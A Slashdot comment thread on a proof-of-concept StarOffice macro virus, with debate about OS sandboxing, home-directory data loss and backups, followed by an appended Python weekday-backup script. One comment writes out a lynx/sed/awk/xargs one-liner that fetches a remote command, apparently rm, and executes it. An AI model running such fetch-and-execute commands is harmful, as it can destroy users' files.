

First StarOffice Virus Sighted

Sam Haine '95 writes "News.com is reporting on the creation of Stardust, a virus which uses macros to attack StarOffice, Sun's office suite. The malware was written as proof-of-concept code to show what might be possible rather than as a serious attempt to create a new attack vector." From the article: "The pest is written in Star Basic. It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting."


  1. it's still basically an OS security issue by yagu · · Score: 3, Interesting

    First, a question, I don't know what the default setting for StarOffice is as to macro execution. Is it turned on by default?

    Regardless, it's no secret or mystery that even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

    OTOH, while it is getting better in Windows, there are still far too many users set up with admin privileges, and we're a long way from sufficient education and reconfiguration such that a typical Windows user has safe access and exploits succeed with only local impact.

    Macros in documents are almost evil, I hate that everything sent somehow has to have its own life-force, but in properly configured systems, they're manageable. (I don't object to macros, I use them all the time, but to make them "required" to get the full effect of e-mail is annoying.)

    1. Re:it's still basically an OS security issue by Otter · · Score: 5, Insightful
      If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

      We have this discussion all the time, but once more can't hurt: on single-user Linux systems or Unix workstations, losing $HOME is far more serious than losing system files.

    2. Re:it's still basically an OS security issue by 99BottlesOfBeerInMyF · · Score: 2, Interesting

      Regardless, it's no secret or mystery that even if by default macro execution is on in StarOffice, the vulnerability is in the OS infrastructure. If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.

      I partially agree with you. Most office software on a normal *nix workstation, however, would have sufficient access to do damage, including erasing personal files and likely even connecting to the internet and sending spam or a DoS attack. Programs like this will have vulnerabilities. Right now, this is not too serious of a threat. A real piece of malware based on this would probably not even propagate anywhere, however it is a valid issue going forward, especially if market share increases.

      The solution in my mind is twofold. First, institute a VM, or Mandatory access control, or jail or whatever you want to call it for all applications. This would limit the exposure from the user directory, to just the files and network access of the application, unless the user specifically allowed the behavior. The second component is a versioned filesystem with redundancy to make sure any files it overwrote could be quickly and painlessly rolled back to the uncorrupted version. This still leaves some room for damage. A subtle malware could add text to a document that might be overlooked, and some clever social engineering could expand the attack. Still, I think both of these are logical directions for security improvements.

    3. Re:it's still basically an OS security issue by jfengel · · Score: 2, Insightful

      I think that protecting the user's own data is sufficient reason to blame this on the app writer, not the OS. Yeah, it's the OS's fault if rootkit-level harm can be done, but I think of that as a whole separate problem. Huge amounts of damage can be done even to the user's sandbox, including disclosure of private information (which isn't the OS's fault, either, if the app is giving its macros access to sockets).

      There's plenty of blame to go around, but it points out a general clue: writing secure generalized systems is hard, whether it's an OS or a word processor that thinks it's an OS. Security is everybody's problem, and you have to think about it every time you get input from a user. Limiting the effect of security failure isn't the same as abnegating responsibility to prevent that failure. The more power you give that user, the more responsibility YOU have to ensure that power isn't misused.

    4. Re:it's still basically an OS security issue by anagama · · Score: 4, Insightful
      If this happened on a Un*x machine (Sun, HP, Linux, BSD), the damage would be confined and limited to what the user had unprotected. It would be highly unusual for a Un*x user hit with a StarOffice macro exploit to have enough exposure to compromise the system.
      For me, the system is the least valuable area. I have system cds and if it gets borked, I can reinstall and reconfigure. A hassle "yes", end of the world "no". What concerns me is all the irreplaceable content in my home directory. In my home dir, I have all the privileges I need to ruin it all. Now, I keep backups because I know that all computers always fail (at some point in time), but most people are pretty cavalier about backing up stuff. Of course, when I backup, I only backup my data because really, the system is stupidly easy to replace. A person who loses all their baby pics due to a malicious macro isn't really going to care that their printer config is still good.
      --
      What changed under Obama? Nothing Good
    5. Re:it's still basically an OS security issue by blibbler · · Score: 2, Interesting

      A Jail for all programs? I am no free software advocate, but that seems pretty extreme! Can't you give them a warning, or at least probation?

    6. Re:it's still basically an OS security issue by zlogic · · Score: 2, Informative

      Mandrake stores the user's backups in a read-only (for normal users) directory. So the virus can damage the user's home dir, but yesterday's (or last week's) backup will remain intact, because only root can hose it and not the user or the virus.

    7. Re:it's still basically an OS security issue by I'm+Don+Giovanni · · Score: 3, Insightful

      "People who don't backup /home every night deserve everything they get."

      But even if you did back up every night, what if some malware corrupted some documents in /home? Maybe changed some vital data in a spreadsheet? Maybe the change would be too subtle to notice, and your spreadsheet would start producing incorrect calculations due to the incorrect data, unbeknownst to you. And when you did your nightly backup, guess what, the corrupted spreadsheet gets backed up as well, so now your backup store is corrupt.

      --
      "I never gave these stories much credence." - HAL 9000
    8. Re:it's still basically an OS security issue by Fred_A · · Score: 2, Funny

      What do you mean "uninterrupted" ? You'd have lost your high score file !!

      --

      May contain traces of nut.
      Made from the freshest electrons.
    9. Re:it's still basically an OS security issue by chill · · Score: 4, Interesting

      If I lose /, I can just download a clean distro. If I lose /home, I'm screwed. /home is infinitely more important on a single-user system.

      Actually, a complete reinstall on a Linux system is so trivial it doesn't matter -- as long as /home is a separate partition. And, of course, you have some skill with the system.

      I don't, nor do I know anyone that does, back up their /home folder daily. I do back it up weekly to a DVD-R, but nightly? The process is too much of a PITA. *CRITICAL* files are backed up, but there is so much that isn't critical, I don't bother.

      What I found was easy was to create a folder for all the updates I have installed (.tgz in my case, but .deb or .rpm for the non-Slackware types) and back THAT up to a CD-R on a regular basis. Then, I can do a reinstall -- skipping /home if possible -- from clean distro disks in maybe 20 minutes. Follow that up with a quick "upgradepkg /mnt/cdrom/updates/*.tgz" and I'm right back to where I was before disaster struck.

      I haven't played with it on Slackware, but on Fedora/Red Hat and their derivatives you could create a kickstart disk after your initial install to automate the reinstall. No need to choose timezones, package sets or anything. Very handy.

      I would like to point out that this is so damned easy because Linux DOES NOT USE A REGISTRY like Windows, instead saves global configs in /etc and user configs in ~. The #1 complaint I had from people restoring Windows from scratch was that they had to waste so much time going back and tweaking the configs on all the software they use. Very, very time consuming.

        -Charles

      --
      Learning HOW to think is more important than learning WHAT to think.
    10. Re:it's still basically an OS security issue by Fred_A · · Score: 2, Insightful

      In the open source world, we don't jail programs, we make them do community work ;)

      --

      May contain traces of nut.
      Made from the freshest electrons.
  2. Missing the best part. by Anonymous Coward · · Score: 3, Funny

    What? No link to the "adult content?"

  3. Virus!? by Kesch · · Score: 5, Funny

    It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting.

    I don't call that a virus, I call it a feature.

    Hopefully the next version will allow you to enter keywords to guide the image downloader.

    --
    If this signature is witty enough, maybe somebody will like me.
    1. Re:Virus!? by IAmTheDave · · Score: 2, Interesting
      I don't call that a virus, I call it a feature.

      Speaking of features, apparently StarBasic has the ability to download content from the internet, and - get this - StarOffice has the ability to DISPLAY IMAGES.

      I knew it was insecure.

      --
      Excuse my speling.
      Making The Bar Project
    2. Re:Virus!? by Jim+Hall · · Score: 3, Funny

      What, no screenshots?

  4. virus? by gEvil+(beta) · · Score: 5, Funny

    It downloads an image file with adult content from the Internet and opens that file in a new document

    That's no virus, that's a productivity tool!

    --
    This guy's the limit!
  5. A Virus by CastrTroy · · Score: 3, Insightful

    Is this really a virus? It downloads an image with adult content, and displays it. It doesn't run any malicious code, doesn't touch your file system, and doesn't leave any trace after it has run. Sure, you may get in trouble at work, if it downloads the single image, but I think that most IT departments would understand, and wouldn't be able to do much for you for downloading a single image with adult content.

    --

    Anthropic principle: We see the universe the way it is because if it were different we would not be here to see it.
    1. Re:A Virus by Golias · · Score: 3, Insightful

      A "Proof of concept" malware example for a non-Microsoft product, such as StarOffice or OS X, is demonstrated in a controlled lab: Big news!

      An actual virus which utterly cripples Windows PCs is discovered in the wild: Business as usual.

      That's pretty much all you need to know about Windows and MS-Office.

      --

      Information wants to be anthropomorphized.

    2. Re:A Virus by packetmon · · Score: 2, Interesting

      What do you think would happen if someone scripted something into it... Remember it's a proof of concept. Doesn't mean someone wouldn't be able to do something uberdumb in a shell...

      lynx -dump http://www.justpasha.org/folk/rm.html|sed -n '4p'|awk '{print $1,$2,$3}'|xargs exec

  6. Learning period by suv4x4 · · Score: 4, Insightful

    The more open source products get used, the more their authors will realize that it's not enough to be l33t to write a secure product.

    It will also require tough and down-to-the-ground tough work such as researching the worms out there and patching the product out.

    Another thing is: you can never "fix" the user, there will always be the guys to run attached executables that promise hot porn and FREE MONY!.

    1. Re:Learning period by TouchOfRed · · Score: 2, Funny

      Ha. One of these days an offer is going to work, and I'll have free pron and FREE MONEY. Then we'll see who's laughing.

    2. Re:Learning period by msuarezalvarez · · Score: 2, Insightful

      I am quite sure they'll be quite happy to hear about your donation of time/money/whatever.

  7. POC != virus by Anonymous Coward · · Score: 2, Insightful

    Proof of concept is not a virus. Sure, it could be, but until it's in the wild it's not really.

  8. Why go through the trouble? by MagicM · · Score: 3, Interesting

    If you want to trick someone into viewing an image, why not just embed the image in the document?

    Where is the "proof" (and the "virus") in this "proof of concept virus"?

    1. Re:Why go through the trouble? by sidfaiwu · · Score: 3, Insightful

      The point is that the image is downloaded and displayed without the user doing anything other than opening the document. The 'proof' is that the code executed even if the user did not want it to. The download-and-display-an-image code could easily be replaced with more malicious code. That is the 'virus' part.

    2. Re:Why go through the trouble? by CastrTroy · · Score: 2, Insightful

      Here's my new virus. I put it in a spreadsheet, it's just 1 line of code. =SUM(A1:A50). When put in cell A51, it automatically gets run every time you load the spreadsheet, and will run when you change the contents of A1 through A50. Just because you can make a program perform a function without user interaction doesn't mean you can run malicious code that will mess with the system/user files, or mess with the hardware in malicious ways.

      --

      Anthropic principle: We see the universe the way it is because if it were different we would not be here to see it.
    3. Re:Why go through the trouble? by BasilBrush · · Score: 2, Informative

      No, that would be the malware part. To be a virus, it needs a method of propagating itself to other systems and files. This may have that, but it's not explicitly stated in TFA or its links.

  9. Bypass mechanism by 16K+Ram+Pack · · Score: 3, Insightful
    Not enough specifics. Does this bypass the "do you want to run macros?" because if so, it's a virus, if not, it's a stupid user virus.

    I'm all for protecting users from their own stupidity, but in the end, there's a point where people stop having any power at all.

  10. Nice! by derxob · · Score: 2

    "It downloads an image file with adult content from the Internet and opens that file in a new document, according to Kaspersky's posting." What a great feature! Jokes aside, this actually could be dangerous if used correctly. The proof-of-concept is only demonstrated with a porn image, but imagine what could potentially be used in place of the adult content...

    --
    Beat the computer, program your life.
  11. Proof of Concept to infect the planet by packetmon · · Score: 4, Interesting

    I've floated the idea of a multicast based worm capable of infecting anyone who is accessing a multicast stream. I came up with this idea after some CCNP studies while doing some multicast tests. For those who need a briefer on how multicast works: What is Multicasting? Multicasting is a technique developed to send packets from one location in the Internet to many other locations, without any unnecessary packet duplication. In multicasting, one packet is sent from a source and is replicated as needed in the network to reach as many end-users as necessary.

    In my theory, a virus creator need create say a corrupted image, sound, etc., and send it through networks as a spoofed source. For example, MSN, AIM, Yahoo! messengers all stream annoying advertisements, so what's to stop someone from creating a packet injection tool to stream a virus through to everyone listening for the multicast and infect their machine.

    Let D=Disney A=Attacker M=Multicast_Address DST=Destination... If A spoofs D sending bad data to M's DST... How many machines can possibly get infected? The framework is there and the possible outcome would be mass infections on a worse level than any worm seen. Of course the whole notion is conceptual but I'm sure it can be done.

    Anyhow in relation to the article, there is no mention of which operating system this PoC affects but I'm sure it will only be a matter of time before someone creates all sorts of perl, sh, python scripts to try and make Unix zombies or so. Luckily I know of no colo places using StarOffice on big piped networks, so DDoS drones are unlikely to come out of this. Simply infected machines... Will be strange to see what else comes out of this.

    1. Re:Proof of Concept to infect the planet by killmenow · · Score: 2, Informative
      The framework is there and the possible outcome would be mass infections on a worse level then any worm seen. Of course the whole notion is conceptual but I'm sure it can be done.
      The reason this won't work is that multicast is blocked by a large percentage of edge routers. Without widescale use of multicast, your PoC would cause little harm. We don't have widescale use of multicast...as one could figure out from the fact you felt it necessary to include a DEFINITION of multicast in your post...assuming most people (even here, on slashdot, where all the geeks are) don't know what multicast is...because it's not in widescale use. From Wikipedia: "In order to prevent conflicts (where two groups have the same group IP) most routers will not forward multicast messages onto other network segments. This behaviour is, however, sometimes configurable on a case-by-case basis (it depends on the router software)."

      And, unless I'm much mistaken, one of the reasons multicast is not in widescale use is because of this type of vulnerability. Also from Wikipedia: "Multicast security is a major issue. Standard, practical, communications security solutions normally employ symmetric cryptography. But applying that to IP Multicast traffic would enable any of the receivers to pose as the sender. This is clearly unacceptable. The IETF MSEC workgroup is developing security protocols to solve this problem, mostly within the architectural framework of the IPsec protocol suite.

      IPsec cannot be used in the multicast scenario because IPsec security associations are bound to two hosts and not many. IETF proposed a new protocol TESLA, which is quite convincing and flexible for multicast security."
  12. No malicious code by Duds · · Score: 2, Insightful

    If you're at the wrong kind of workplace, suddenly having porn on your screen is pretty bloody malicious.

  13. Erh... no, boss, erh... no, that wasn't me by Opportunist · · Score: 4, Funny

    Me? Looking at porn at work? Noooo, sorry, must be that virus goin' round.

    A heartfelt THANK YOU to the author!

    --
    We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
  14. Thanks! by Chris+Bradshaw · · Score: 3, Funny
    "proof-of-concept"

    Cool... Thanks for the idea!

    Respectfully Signed,
    Anonymous Redmond Washington Resident

    --
    Get your Windows Malicious Software Removal Tool Here for FREE! - http://fedora.redhat.com
  15. Losing data is always the real problem. by khasim · · Score: 3, Informative

    If you're in a company and a "virus" takes out one of the system files on one of your servers ... but the data is safe, you have less of a problem than if a "virus" leaves the server intact, but deletes all of your data.

    It's always about the security of the data.

    Which is why part of the OS's job is to restrict the ability of regular users as much as possible.

    When all that is in danger is your personal home directory, that's really as good as the OS can be.

    If we're talking single user/home machines ... the risk is greater that your hard drive will fail before you get a "virus" on your Linux box. With a failed hard drive (and no backup), you've lost all your data. At some point, it is up to the admin (the user in this case) to back-up his/her data. There is a point at which the OS/app's responsibility ends and the admin's begins.

  16. OpenOffice too! by levell · · Score: 2, Informative

    Although the summary doesn't explicitly say it, the article confirms that this affects OO as well as StarOffice

    --
    Struggling to find a day everyone can make? WhenShallWe.com
  17. Yawn by jofi · · Score: 2, Interesting

    So like every win32 virus it isn't a spawn of already existing code, and someone had to write it using an existing API or scripting engine that anyone can use and has already used for otherwise legitimate purposes? Get rid of scripting engines and APIs. Problem solved.

    --
    Blame the user, not the software.
  18. Proof of security by MobyDisk · · Score: 2, Insightful

    This virus doesn't do any damage. Is that because Star Basic runs in a sandbox and can't actually do damage? Or is it because the proof-of-concept virus didn't want to do any damage? If there is a sandbox, all this did is prove how secure Star Office is, not how vulnerable it is.

  19. Is this really a virus? by xutopia · · Score: 3, Insightful

    Pardon me for asking but doesn't the definition of a virus include duplication? All I hear is that some code can download a picture. How does it "reproduce" itself and infect other stations?

  20. hm.. by DoctorDyna · · Score: 2, Informative
    It seems as though they intend "proof of concept" to mean "Yes, it *IS* possible to manipulate this software with a virus, had we wanted to."

    Just because all it does is download porn, doesn't mean that it couldn't download a shell script that wipes out the MBR on your hard disk.

    --
    Windows has more viruses because linux has more virus coders.
  21. goatse by EccentricAnomaly · · Score: 5, Funny

    What? No link to the "adult content?"

    be careful what you wish for... the 'adult content' could be goatse

    --
    There are 10 types of people in this world, those who can count in binary and those who can't.
  22. No need to worry by sootman · · Score: 4, Funny

    Both StarOffice users have been contacted and were warned to be careful.

    --
    Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
  23. Meet my mother by atrocious+cowpat · · Score: 2, Interesting
    "I don't, nor do I know anyone that does, back up their /home folder daily."

    My mom works on a (OS X) Mac (small home office), so far safe as houses as far as viruses are concerned. Still her machine is backupped (is that actually a word?) on a 7-day basis, i.e. every day of the week her user directory is written to a different backup set on a separate HD (= 7 different backups, one for each day of the week). Every 3-4 weeks I burn a snapshot of all her data onto DVDs. Why?

    It may seem like overkill, but I set things up this way not because I'm scared of the havoc a virus might wreak, but because I know that my mother every once in a while f*s up, deletes or otherwise ruins important files, preferably spreadsheets that are extremely painful to reconstruct. Her own files - not system files. And usually she doesn't notice until either 3 days or 3 months later.

    I sleep well, she can do whatever she wants, and everyone is happy.
    --
    sig? Oh, that sig...
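An added example, not code from the page or from any of the posters, that implements the backup arrangement the thread converges on: one backup set per weekday as in atrocious cowpat's setup for his mother, kept in a location the user account cannot write (zlogic's Mandrake arrangement, assumed here to be a root-owned directory written from root's cron), plus a SHA-256 manifest per set so that the subtly corrupted spreadsheet Don Giovanni worries about can be traced to the day it changed and pulled back from the last clean set. The directory names, dates and file contents in `demo()` are constructed.

```python
import hashlib
import json
import shutil
import tempfile
from datetime import date
from pathlib import Path

# One backup set per weekday; Monday's set is overwritten the following Monday.
DAYS = ["mon", "tue", "wed", "thu", "fri", "sat", "sun"]
MANIFEST = "MANIFEST.json"
# Assumption: in deployment backup_root is owned by root and this job runs from
# root's crontab, so a macro running as the user can only alter the live home.

def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_manifest(root: Path) -> dict:
    """Relative path -> SHA-256 for every regular file under root."""
    return {str(p.relative_to(root)): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}

def backup_home(home: Path, backup_root: Path, day: date) -> Path:
    """Copy home into the set for `day` and record a hash manifest beside it."""
    set_dir = backup_root / DAYS[day.weekday()]
    if set_dir.exists():
        shutil.rmtree(set_dir)          # only today's slot is replaced; other days stay
    shutil.copytree(home, set_dir / "home")
    manifest = build_manifest(set_dir / "home")
    (set_dir / MANIFEST).write_text(json.dumps(manifest, indent=1, sort_keys=True))
    return set_dir

def changed_between(backup_root: Path, older: str, newer: str) -> dict:
    """Files whose content differs between two sets: modified, added or deleted."""
    a = json.loads((backup_root / older / MANIFEST).read_text())
    b = json.loads((backup_root / newer / MANIFEST).read_text())
    diff = {}
    for name in sorted(set(a) | set(b)):
        if name not in b:
            diff[name] = "deleted"
        elif name not in a:
            diff[name] = "added"
        elif a[name] != b[name]:
            diff[name] = "modified"
    return diff

def restore_file(backup_root: Path, set_name: str, rel: str, home: Path) -> Path:
    """Copy one file back from a chosen set into the live home directory."""
    dst = home / rel
    dst.parent.mkdir(parents=True, exist_ok=True)
    shutil.copy2(backup_root / set_name / "home" / rel, dst)
    return dst

def demo() -> dict:
    """Constructed scenario: a macro silently edits a spreadsheet between two runs."""
    with tempfile.TemporaryDirectory() as tmp:
        home, backups = Path(tmp) / "home", Path(tmp) / "backups"
        home.mkdir()
        sheet = home / "budget.csv"
        sheet.write_text("item,amount\nrent,1200\n")
        (home / "notes.txt").write_text("unchanged\n")
        backup_home(home, backups, date(2006, 5, 29))   # a Monday: clean copy
        sheet.write_text("item,amount\nrent,1300\n")    # subtle change, unnoticed
        (home / "notes.txt").unlink()
        backup_home(home, backups, date(2006, 5, 30))   # Tuesday copies the bad data
        diff = changed_between(backups, "mon", "tue")   # manifest diff pinpoints it
        restore_file(backups, "mon", "budget.csv", home)
        return {"diff": diff, "restored": sheet.read_text()}
```

The manifest diff is what turns a "nightly backup of corrupted data" into a recoverable event: instead of guessing which set predates the damage, compare adjacent sets and restore from the newest one whose hash still matches.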